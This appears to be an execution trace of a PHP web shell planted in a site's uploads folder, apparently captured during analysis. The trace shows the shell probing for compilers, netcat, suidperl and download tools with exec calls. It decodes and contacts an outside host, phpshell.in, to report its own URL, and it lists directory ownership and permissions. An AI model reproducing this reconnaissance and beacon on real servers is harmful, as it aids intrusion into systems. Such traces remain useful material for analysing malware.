6 95 0 0.008510 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which gcc' ''
6 95 1 0.010248 1008248
6 95 R '/usr/bin/gcc'
6 96 0 0.010322 1008144 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' [0 => '/usr/bin/gcc']
6 96 1 0.010354 1008208
6 96 R '/usr/bin/gcc'
5 A /var/www/html/uploads/deobf.php 27 $out = '/usr/bin/gcc'
5 93 1 0.010421 1007744
5 93 R '/usr/bin/gcc'
4 A /var/www/html/uploads/deobf.php 1274 $path = '/usr/bin/gcc'
4 92 1 0.010472 1007704
4 92 R '/usr/bin/gcc'
4 97 0 0.010505 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 688 1 'lcc'
5 98 0 0.010530 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which lcc'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 99 0 0.010575 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 99 1 0.010601 1007744
6 99 R TRUE
6 100 0 0.010627 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which lcc' ''
6 100 1 0.012263 1007848
6 100 R ''
6 101 0 0.012305 1007784 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' []
6 101 1 0.012328 1007848
6 101 R ''
5 A /var/www/html/uploads/deobf.php 27 $out = ''
5 98 1 0.012366 1007704
5 98 R ''
4 A /var/www/html/uploads/deobf.php 1274 $path = ''
4 97 1 0.012401 1007664
4 97 R FALSE
4 102 0 0.012422 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 688 1 'cc'
5 103 0 0.012441 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which cc'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 104 0 0.012474 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 104 1 0.012494 1007744
6 104 R TRUE
6 105 0 0.012514 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which cc' ''
6 105 1 0.014894 1008248
6 105 R '/usr/bin/cc'
6 106 0 0.014931 1008144 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' [0 => '/usr/bin/cc']
6 106 1 0.014955 1008208
6 106 R '/usr/bin/cc'
5 A /var/www/html/uploads/deobf.php 27 $out = '/usr/bin/cc'
5 103 1 0.014992 1007744
5 103 R '/usr/bin/cc'
4 A /var/www/html/uploads/deobf.php 1274 $path = '/usr/bin/cc'
4 102 1 0.015027 1007704
4 102 R '/usr/bin/cc'
4 107 0 0.015049 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 688 1 'ld'
5 108 0 0.015067 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which ld'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 109 0 0.015099 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 109 1 0.015118 1007744
6 109 R TRUE
6 110 0 0.015136 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which ld' ''
6 110 1 0.016471 1008248
6 110 R '/usr/bin/ld'
6 111 0 0.016504 1008144 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' [0 => '/usr/bin/ld']
6 111 1 0.016526 1008208
6 111 R '/usr/bin/ld'
5 A /var/www/html/uploads/deobf.php 27 $out = '/usr/bin/ld'
5 108 1 0.016561 1007744
5 108 R '/usr/bin/ld'
4 A /var/www/html/uploads/deobf.php 1274 $path = '/usr/bin/ld'
4 107 1 0.016596 1007704
4 107 R '/usr/bin/ld'
4 112 0 0.016617 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 688 1 'make'
5 113 0 0.016636 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which make'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 114 0 0.016668 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 114 1 0.016686 1007744
6 114 R TRUE
6 115 0 0.016704 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which make' ''
6 115 1 0.017993 1008248
6 115 R '/usr/bin/make'
6 116 0 0.018025 1008144 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' [0 => '/usr/bin/make']
6 116 1 0.018047 1008208
6 116 R '/usr/bin/make'
5 A /var/www/html/uploads/deobf.php 27 $out = '/usr/bin/make'
5 113 1 0.018083 1007744
5 113 R '/usr/bin/make'
4 A /var/www/html/uploads/deobf.php 1274 $path = '/usr/bin/make'
4 112 1 0.018118 1007704
4 112 R '/usr/bin/make'
4 117 0 0.018138 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 688 1 'php'
5 118 0 0.018157 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which php'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 119 0 0.018198 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 119 1 0.018217 1007744
6 119 R TRUE
6 120 0 0.018235 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which php' ''
6 120 1 0.019521 1008248
6 120 R '/usr/bin/php'
6 121 0 0.019567 1008144 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' [0 => '/usr/bin/php']
6 121 1 0.019596 1008208
6 121 R '/usr/bin/php'
5 A /var/www/html/uploads/deobf.php 27 $out = '/usr/bin/php'
5 118 1 0.019641 1007744
5 118 R '/usr/bin/php'
4 A /var/www/html/uploads/deobf.php 1274 $path = '/usr/bin/php'
4 117 1 0.019683 1007704
4 117 R '/usr/bin/php'
4 122 0 0.019708 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 688 1 'perl'
5 123 0 0.019731 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which perl'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 124 0 0.019769 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 124 1 0.019791 1007744
6 124 R TRUE
6 125 0 0.019813 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which perl' ''
6 125 1 0.021577 1008248
6 125 R '/usr/bin/perl'
6 126 0 0.021639 1008144 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' [0 => '/usr/bin/perl']
6 126 1 0.021668 1008208
6 126 R '/usr/bin/perl'
5 A /var/www/html/uploads/deobf.php 27 $out = '/usr/bin/perl'
5 123 1 0.021712 1007744
5 123 R '/usr/bin/perl'
4 A /var/www/html/uploads/deobf.php 1274 $path = '/usr/bin/perl'
4 122 1 0.021754 1007704
4 122 R '/usr/bin/perl'
4 127 0 0.021781 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 688 1 'python'
5 128 0 0.021803 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which python'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 129 0 0.021841 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 129 1 0.021863 1007744
6 129 R TRUE
6 130 0 0.021885 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which python' ''
6 130 1 0.023441 1007848
6 130 R ''
6 131 0 0.023482 1007784 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' []
6 131 1 0.023507 1007848
6 131 R ''
5 A /var/www/html/uploads/deobf.php 27 $out = ''
5 128 1 0.023547 1007704
5 128 R ''
4 A /var/www/html/uploads/deobf.php 1274 $path = ''
4 127 1 0.023586 1007664
4 127 R FALSE
4 132 0 0.023609 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 688 1 'ruby'
5 133 0 0.023631 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which ruby'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 134 0 0.023668 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 134 1 0.023689 1007744
6 134 R TRUE
6 135 0 0.023711 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which ruby' ''
6 135 1 0.025995 1007848
6 135 R ''
6 136 0 0.026034 1007784 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' []
6 136 1 0.026058 1007848
6 136 R ''
5 A /var/www/html/uploads/deobf.php 27 $out = ''
5 133 1 0.026099 1007704
5 133 R ''
4 A /var/www/html/uploads/deobf.php 1274 $path = ''
4 132 1 0.026138 1007664
4 132 R FALSE
4 137 0 0.026161 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 688 1 'tar'
5 138 0 0.026182 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which tar'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 139 0 0.026219 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 139 1 0.026241 1007744
6 139 R TRUE
6 140 0 0.026261 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which tar' ''
6 140 1 0.027809 1008248
6 140 R '/usr/bin/tar'
6 141 0 0.027849 1008144 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' [0 => '/usr/bin/tar']
6 141 1 0.027885 1008208
6 141 R '/usr/bin/tar'
5 A /var/www/html/uploads/deobf.php 27 $out = '/usr/bin/tar'
5 138 1 0.027929 1007744
5 138 R '/usr/bin/tar'
4 A /var/www/html/uploads/deobf.php 1274 $path = '/usr/bin/tar'
4 137 1 0.027970 1007704
4 137 R '/usr/bin/tar'
4 142 0 0.027995 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 688 1 'gzip'
5 143 0 0.028017 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which gzip'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 144 0 0.028055 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 144 1 0.028076 1007744
6 144 R TRUE
6 145 0 0.028097 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which gzip' ''
6 145 1 0.029881 1008248
6 145 R '/usr/bin/gzip'
6 146 0 0.029923 1008144 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' [0 => '/usr/bin/gzip']
6 146 1 0.029950 1008208
6 146 R '/usr/bin/gzip'
5 A /var/www/html/uploads/deobf.php 27 $out = '/usr/bin/gzip'
5 143 1 0.029994 1007744
5 143 R '/usr/bin/gzip'
4 A /var/www/html/uploads/deobf.php 1274 $path = '/usr/bin/gzip'
4 142 1 0.030036 1007704
4 142 R '/usr/bin/gzip'
4 147 0 0.030061 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 688 1 'bzip'
5 148 0 0.030082 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which bzip'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 149 0 0.030120 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 149 1 0.030142 1007744
6 149 R TRUE
6 150 0 0.030163 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which bzip' ''
6 150 1 0.031882 1007848
6 150 R ''
6 151 0 0.031938 1007784 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' []
6 151 1 0.031966 1007848
6 151 R ''
5 A /var/www/html/uploads/deobf.php 27 $out = ''
5 148 1 0.032008 1007704
5 148 R ''
4 A /var/www/html/uploads/deobf.php 1274 $path = ''
4 147 1 0.032048 1007664
4 147 R FALSE
4 152 0 0.032072 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 688 1 'bzip2'
5 153 0 0.032095 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which bzip2'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 154 0 0.032133 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 154 1 0.032155 1007744
6 154 R TRUE
6 155 0 0.032177 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which bzip2' ''
6 155 1 0.033764 1008248
6 155 R '/usr/bin/bzip2'
6 156 0 0.033815 1008144 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' [0 => '/usr/bin/bzip2']
6 156 1 0.033843 1008208
6 156 R '/usr/bin/bzip2'
5 A /var/www/html/uploads/deobf.php 27 $out = '/usr/bin/bzip2'
5 153 1 0.033887 1007744
5 153 R '/usr/bin/bzip2'
4 A /var/www/html/uploads/deobf.php 1274 $path = '/usr/bin/bzip2'
4 152 1 0.033928 1007704
4 152 R '/usr/bin/bzip2'
4 157 0 0.033954 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 688 1 'nc'
5 158 0 0.033975 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which nc'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 159 0 0.034012 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 159 1 0.034034 1007744
6 159 R TRUE
6 160 0 0.034055 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which nc' ''
6 160 1 0.036762 1008248
6 160 R '/usr/bin/nc'
6 161 0 0.036804 1008144 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' [0 => '/usr/bin/nc']
6 161 1 0.036830 1008208
6 161 R '/usr/bin/nc'
5 A /var/www/html/uploads/deobf.php 27 $out = '/usr/bin/nc'
5 158 1 0.036873 1007744
5 158 R '/usr/bin/nc'
4 A /var/www/html/uploads/deobf.php 1274 $path = '/usr/bin/nc'
4 157 1 0.036914 1007704
4 157 R '/usr/bin/nc'
4 162 0 0.036951 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 688 1 'locate'
5 163 0 0.036979 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which locate'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 164 0 0.037016 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 164 1 0.037038 1007744
6 164 R TRUE
6 165 0 0.037059 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which locate' ''
6 165 1 0.038603 1007848
6 165 R ''
6 166 0 0.038639 1007784 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' []
6 166 1 0.038664 1007848
6 166 R ''
5 A /var/www/html/uploads/deobf.php 27 $out = ''
5 163 1 0.038704 1007704
5 163 R ''
4 A /var/www/html/uploads/deobf.php 1274 $path = ''
4 162 1 0.038743 1007664
4 162 R FALSE
4 167 0 0.038766 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 688 1 'suidperl'
5 168 0 0.038787 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which suidperl'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 169 0 0.038824 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 169 1 0.038846 1007744
6 169 R TRUE
6 170 0 0.038867 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which suidperl' ''
6 170 1 0.040651 1007848
6 170 R ''
6 171 0 0.040692 1007784 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' []
6 171 1 0.040717 1007848
6 171 R ''
5 A /var/www/html/uploads/deobf.php 27 $out = ''
5 168 1 0.040757 1007704
5 168 R ''
4 A /var/www/html/uploads/deobf.php 1274 $path = ''
4 167 1 0.040796 1007664
4 167 R FALSE
3 A /var/www/html/uploads/deobf.php 693 $downloaders = [0 => 'wget', 1 => 'fetch', 2 => 'lynx', 3 => 'links', 4 => 'curl', 5 => 'get', 6 => 'lwp-mirror']
4 172 0 0.040851 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 694 1 'wget'
5 173 0 0.040873 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which wget'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 174 0 0.040910 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 174 1 0.040932 1007744
6 174 R TRUE
6 175 0 0.040953 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which wget' ''
6 175 1 0.042553 1008248
6 175 R '/usr/bin/wget'
6 176 0 0.042604 1008144 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' [0 => '/usr/bin/wget']
6 176 1 0.042633 1008208
6 176 R '/usr/bin/wget'
5 A /var/www/html/uploads/deobf.php 27 $out = '/usr/bin/wget'
5 173 1 0.042677 1007744
5 173 R '/usr/bin/wget'
4 A /var/www/html/uploads/deobf.php 1274 $path = '/usr/bin/wget'
4 172 1 0.042719 1007704
4 172 R '/usr/bin/wget'
4 177 0 0.042746 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 694 1 'fetch'
5 178 0 0.042767 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which fetch'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 179 0 0.042805 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 179 1 0.042828 1007744
6 179 R TRUE
6 180 0 0.042849 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which fetch' ''
6 180 1 0.044380 1007848
6 180 R ''
6 181 0 0.044422 1007784 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' []
6 181 1 0.044447 1007848
6 181 R ''
5 A /var/www/html/uploads/deobf.php 27 $out = ''
5 178 1 0.044487 1007704
5 178 R ''
4 A /var/www/html/uploads/deobf.php 1274 $path = ''
4 177 1 0.044525 1007664
4 177 R FALSE
4 182 0 0.044548 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 694 1 'lynx'
5 183 0 0.044569 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which lynx'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 184 0 0.044606 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 184 1 0.044628 1007744
6 184 R TRUE
6 185 0 0.044649 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which lynx' ''
6 185 1 0.047325 1007848
6 185 R ''
6 186 0 0.047368 1007784 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' []
6 186 1 0.047392 1007848
6 186 R ''
5 A /var/www/html/uploads/deobf.php 27 $out = ''
5 183 1 0.047432 1007704
5 183 R ''
4 A /var/www/html/uploads/deobf.php 1274 $path = ''
4 182 1 0.047471 1007664
4 182 R FALSE
4 187 0 0.047494 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 694 1 'links'
5 188 0 0.047516 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which links'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 189 0 0.047553 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 189 1 0.047575 1007744
6 189 R TRUE
6 190 0 0.047596 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which links' ''
6 190 1 0.049057 1007848
6 190 R ''
6 191 0 0.049093 1007784 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' []
6 191 1 0.049117 1007848
6 191 R ''
5 A /var/www/html/uploads/deobf.php 27 $out = ''
5 188 1 0.049181 1007704
5 188 R ''
4 A /var/www/html/uploads/deobf.php 1274 $path = ''
4 187 1 0.049222 1007664
4 187 R FALSE
4 192 0 0.049244 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 694 1 'curl'
5 193 0 0.049266 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which curl'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 194 0 0.049306 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 194 1 0.049328 1007744
6 194 R TRUE
6 195 0 0.049349 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which curl' ''
6 195 1 0.050843 1008248
6 195 R '/usr/bin/curl'
6 196 0 0.050885 1008144 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' [0 => '/usr/bin/curl']
6 196 1 0.050911 1008208
6 196 R '/usr/bin/curl'
5 A /var/www/html/uploads/deobf.php 27 $out = '/usr/bin/curl'
5 193 1 0.050955 1007744
5 193 R '/usr/bin/curl'
4 A /var/www/html/uploads/deobf.php 1274 $path = '/usr/bin/curl'
4 192 1 0.050997 1007704
4 192 R '/usr/bin/curl'
4 197 0 0.051022 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 694 1 'get'
5 198 0 0.051044 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which get'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 199 0 0.051081 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 199 1 0.051103 1007744
6 199 R TRUE
6 200 0 0.051125 1007728 exec 0 /var/www/html/uploads/deobf.php 25 2 'which get' ''
6 200 1 0.052621 1007848
6 200 R ''
6 201 0 0.052664 1007784 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' []
6 201 1 0.052689 1007848
6 201 R ''
5 A /var/www/html/uploads/deobf.php 27 $out = ''
5 198 1 0.052730 1007704
5 198 R ''
4 A /var/www/html/uploads/deobf.php 1274 $path = ''
4 197 1 0.052769 1007664
4 197 R FALSE
4 202 0 0.052792 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 694 1 'lwp-mirror'
5 203 0 0.052814 1007712 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which lwp-mirror'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 204 0 0.052851 1007712 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 204 1 0.052873 1007752
6 204 R TRUE
6 205 0 0.052894 1007736 exec 0 /var/www/html/uploads/deobf.php 25 2 'which lwp-mirror' ''
6 205 1 0.054365 1008272
6 205 R '/usr/bin/lwp-mirror'
6 206 0 0.054405 1008160 join 0 /var/www/html/uploads/deobf.php 27 2 '\r\n' [0 => '/usr/bin/lwp-mirror']
6 206 1 0.054430 1008224
6 206 R '/usr/bin/lwp-mirror'
5 A /var/www/html/uploads/deobf.php 27 $out = '/usr/bin/lwp-mirror'
5 203 1 0.054473 1007760
5 203 R '/usr/bin/lwp-mirror'
4 A /var/www/html/uploads/deobf.php 1274 $path = '/usr/bin/lwp-mirror'
4 202 1 0.054515 1007712
4 202 R '/usr/bin/lwp-mirror'
4 207 0 0.054555 1008944 getenv 0 /var/www/html/uploads/deobf.php 714 1 'SERVER_SOFTWARE'
4 207 1 0.054581 1009024
4 207 R 'Apache/2.4.52 (Ubuntu)'
4 208 0 0.054613 1008112 base64_encode 0 /var/www/html/uploads/deobf.php 722 1 '/var/www/html/uploads'
4 208 1 0.054635 1008208
4 208 R 'L3Zhci93d3cvaHRtbC91cGxvYWRz'
4 209 0 0.054931 1015856 base64_decode 0 /var/www/html/uploads/deobf.php 1079 1 'aHR0cDovL3BocHNoZWxsLmluL2wt'
4 209 1 0.054957 1015944
4 209 R 'http://phpshell.in/l-'
4 210 0 0.054982 1015912 GetIP 1 /var/www/html/uploads/deobf.php 1079 0
5 211 0 0.055000 1015912 getenv 0 /var/www/html/uploads/deobf.php 1073 1 'HTTP_CLIENT_IP'
5 211 1 0.055022 1015944
5 211 R FALSE
5 212 0 0.055044 1015912 getenv 0 /var/www/html/uploads/deobf.php 1074 1 'HTTP_X_FORWARDED_FOR'
5 212 1 0.055066 1015944
5 212 R FALSE
5 213 0 0.055086 1015912 getenv 0 /var/www/html/uploads/deobf.php 1077 1 'REMOTE_ADDR'
5 213 1 0.055108 1015984
5 213 R '127.0.0.1'
4 A /var/www/html/uploads/deobf.php 1077 $ip = '127.0.0.1'
4 210 1 0.055148 1015952
4 210 R '127.0.0.1'
4 214 0 0.055171 1015976 base64_encode 0 /var/www/html/uploads/deobf.php 1079 1 'http://localhost/uploads/deobf.php'
4 214 1 0.055193 1016088
4 214 R 'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2Rlb2JmLnBocA=='
3 A /var/www/html/uploads/deobf.php 1079 $x = 'http://phpshell.in/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2Rlb2JmLnBocA=='
4 215 0 0.055254 1015968 function_exists 0 /var/www/html/uploads/deobf.php 1080 1 'curl_init'
4 215 1 0.055276 1016008
4 215 R TRUE
4 216 0 0.055297 1015968 curl_init 0 /var/www/html/uploads/deobf.php 1080 0
4 216 1 0.055326 1016880
4 216 R resource(27) of type (curl)
3 A /var/www/html/uploads/deobf.php 1080 $ch = resource(27) of type (curl)
4 217 0 0.055370 1016880 curl_setopt 0 /var/www/html/uploads/deobf.php 1081 3 resource(27) of type (curl) 10002 'http://phpshell.in/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2Rlb2JmLnBocA=='
4 217 1 0.055402 1016976
4 217 R TRUE
4 218 0 0.055424 1016880 curl_setopt 0 /var/www/html/uploads/deobf.php 1082 3 resource(27) of type (curl) 19913 TRUE
4 218 1 0.055448 1016976
4 218 R TRUE
4 219 0 0.055469 1016880 curl_exec 0 /var/www/html/uploads/deobf.php 1083 1 resource(27) of type (curl)
4 219 1 0.205676 1017168
4 219 R '<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx</center>\r\n</body>\r\n</html>\r\n'
3 A /var/www/html/uploads/deobf.php 1083 $gitt = '<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx</center>\r\n</body>\r\n</html>\r\n'
4 220 0 0.205734 1017136 curl_close 0 /var/www/html/uploads/deobf.php 1084 1 resource(27) of type (curl)
4 220 1 0.205790 1016280
4 220 R NULL
4 221 0 0.205812 1016248 htmlspecialchars 0 /var/www/html/uploads/deobf.php 1147 1 '/var/www/html/uploads/'
4 221 1 0.205829 1016440
4 221 R '/var/www/html/uploads/'
3 26 1 0.205847 1014280
3 222 0 0.205857 1014280 scandir 0 /var/www/html/uploads/deobf.php 1319 1 '/var/www/html/uploads/'
3 222 1 0.205899 1014904
3 222 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'deobf.php', 5 => 'prepend.php']
2 A /var/www/html/uploads/deobf.php 1319 $dirContent = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'deobf.php', 5 => 'prepend.php']
2 A /var/www/html/uploads/deobf.php 1324 $sort = [0 => 'name', 1 => 1]
2 A /var/www/html/uploads/deobf.php 1329 $files = []
2 A /var/www/html/uploads/deobf.php 1329 $dirs = []
2 A /var/www/html/uploads/deobf.php 1330 $n = 6
2 A /var/www/html/uploads/deobf.php 1331 $i = 0
3 223 0 0.205995 1014896 fileowner 0 /var/www/html/uploads/deobf.php 1333 1 '.'
3 223 1 0.206013 1014944
3 223 R 0
3 224 0 0.206026 1014904 posix_getpwuid 0 /var/www/html/uploads/deobf.php 1333 1 0
3 224 1 0.206056 1015704
3 224 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 A /var/www/html/uploads/deobf.php 1333 $ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 225 0 0.206105 1015672 filegroup 0 /var/www/html/uploads/deobf.php 1334 1 '.'
3 225 1 0.206119 1015712
3 225 R 0
3 226 0 0.206132 1015672 posix_getgrgid 0 /var/www/html/uploads/deobf.php 1334 1 0
3 226 1 0.206157 1016328
3 226 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 A /var/www/html/uploads/deobf.php 1334 $gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 227 0 0.206194 1016768 filemtime 0 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/.'
3 227 1 0.206210 1016824
3 227 R 1676247232
3 228 0 0.206223 1016736 date 0 /var/www/html/uploads/deobf.php 1335 2 'Y-m-d H:i:s' 1676247232
3 228 1 0.206284 1019128
3 228 R '2023-02-12 19:13:52'
3 229 0 0.206303 1019104 yemenPermsColor 1 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/.'
4 230 0 0.206318 1019104 is_readable 0 /var/www/html/uploads/deobf.php 1299 1 '/var/www/html/uploads/.'
4 230 1 0.206335 1019144
4 230 R TRUE
4 231 0 0.206349 1019104 is_writable 0 /var/www/html/uploads/deobf.php 1300 1 '/var/www/html/uploads/.'
4 231 1 0.206364 1019144
4 231 R TRUE
4 232 0 0.206378 1019104 fileperms 0 /var/www/html/uploads/deobf.php 1301 1 '/var/www/html/uploads/.'
4 232 1 0.206391 1019144
4 232 R 16895
4 233 0 0.206404 1019104 yemenPerms 1 /var/www/html/uploads/deobf.php 1301 1 16895
4 A /var/www/html/uploads/deobf.php 1285 $i = 'd'
4 A /var/www/html/uploads/deobf.php 1289 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1290 $i .= 'w'
4 A /var/www/html/uploads/deobf.php 1291 $i .= 'x'
4 A /var/www/html/uploads/deobf.php 1292 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1293 $i .= 'w'
4 A /var/www/html/uploads/deobf.php 1294 $i .= 'x'
4 A /var/www/html/uploads/deobf.php 1295 $i .= 'r'
4 A /var/www/html/uploads/deobf.php 1296 $i .= 'w'
4 A /var/www/html/uploads/deobf.php 1297 $i .= 'x'
4 233 1 0.206517 1019144
4 233 R 'drwxrwxrwx'
3 229 1 0.206532 1019168
3 229 R '<font color=#25ff00>drwxrwxrwx</font>'
3 234 0 0.206549 1019168 filesize 0 /var/www/html/uploads/deobf.php 1335 1 '/var/www/html/uploads/.'
3 234 1 0.206562 1019208
3 234 R 4096
